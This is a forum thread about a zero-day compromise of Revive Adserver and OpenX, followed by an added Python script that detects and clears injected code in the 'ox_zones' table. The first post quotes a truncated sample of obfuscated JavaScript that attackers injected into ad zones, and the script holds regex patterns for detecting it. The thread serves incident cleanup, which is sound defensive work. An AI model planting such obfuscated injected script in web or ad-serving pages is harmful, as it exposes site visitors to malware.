Hey_neken Posted January 2, 2014

If someone is suffering alerts from Avast about some trojan in the invocation code, as shown on #224 ( https://github.com/revive-adserver/revive-adserver/issues/224 ), please do the following:

- Upgrade to revive-adserver-3.0.2 ASAP. The bug is present on <= revive-adserver-3.0.1 and on OpenX (confirmed on 2.8.7 to 2.8.11). This won't fix the problem but will prevent more attacks. More info at: http://www.kreativrauschen.com/blog/2013/12/18/zero-day-vulnerability-in-openx-source-2-8-11-and-revive-adserver-3-0-1/
- Look in the 'ox_zones' table for any suspicious code. The code will be in the 'prepend' and 'append' fields. It will look something like:

<script>try{$a=~[];$a={___:++$a,$$$$![]+\"\")[$a],__$:++$a,$_$_![]+\"\")[$a],_$_:++$a,$_$${}+\"\")[$a],$$_$$a[$a]+\"\")[$a],_$$:++$a,$$$_!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__{}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$ (...)

- Empty those fields

mx_starter Posted January 2, 2014

I can confirm this procedure, also. My investigation showed that the code is present in the ox_audit table, too. Will post a separate topic in a minute...

andrewatfornax Posted January 5, 2014

For completeness, I think the separate topic suggested is http://forum.revive-adserver.com/topic/92-avast-detecting-trojan-in-the-openx-delivery/
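
The check-and-clean step from the first post (look at 'prepend' and 'append' in 'ox_zones', then empty them), written out as an added example that is not part of the thread or of the Revive Adserver code base. It assumes an in-memory SQLite table standing in for the real database, a `zoneid` key column, two matching heuristics chosen for this example, and a hypothetical `ox_zones_evidence` table that keeps a copy of the injected content before the fields are emptied; the sample rows are constructed.

```python
import re
import sqlite3

# Heuristics assumed for this example: any <script> tag, or the "$a=~[]"
# opening seen in the block quoted in the first post.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
OBFUSCATED_START = re.compile(r"\$\w*\s*=\s*~\s*\[\s*\]")

def suspicious(value):
    """Return the reasons a prepend/append value needs manual review."""
    reasons = []
    if value and SCRIPT_TAG.search(value):
        reasons.append("script-tag")
    if value and OBFUSCATED_START.search(value):
        reasons.append("obfuscated-start")
    return reasons

def scan_zones(conn):
    """Map zoneid -> {field: reasons} for every flagged row of ox_zones."""
    findings = {}
    rows = conn.execute("SELECT zoneid, prepend, append FROM ox_zones")
    for zoneid, prepend, append in rows:
        hit = {f: r for f, v in (("prepend", prepend), ("append", append))
               if (r := suspicious(v))}
        if hit:
            findings[zoneid] = hit
    return findings

def preserve_and_clear(conn, zoneids):
    """Copy flagged rows to an evidence table, then empty both fields."""
    conn.execute("CREATE TABLE IF NOT EXISTS ox_zones_evidence AS "
                 "SELECT zoneid, prepend, append FROM ox_zones WHERE 0")
    for zid in zoneids:
        conn.execute("INSERT INTO ox_zones_evidence SELECT zoneid, prepend, "
                     "append FROM ox_zones WHERE zoneid = ?", (zid,))
        conn.execute("UPDATE ox_zones SET prepend = '', append = '' "
                     "WHERE zoneid = ?", (zid,))
    conn.commit()

def demo():
    """Run the check on a constructed in-memory stand-in for ox_zones."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ox_zones (zoneid INTEGER, prepend TEXT, append TEXT)")
    conn.executemany("INSERT INTO ox_zones VALUES (?, ?, ?)", [
        (1, "", ""),                                   # clean zone
        (2, "<!-- house banner -->", None),            # benign markup
        (3, "", "<script>try{$a=~[];$a={___:++$a};}catch(e){}</script>"),
    ])
    before = scan_zones(conn)
    preserve_and_clear(conn, list(before))
    return before, scan_zones(conn), conn
```

A flagged zone is a candidate for review, not proof of compromise, since a zone can carry a script its owner put there on purpose.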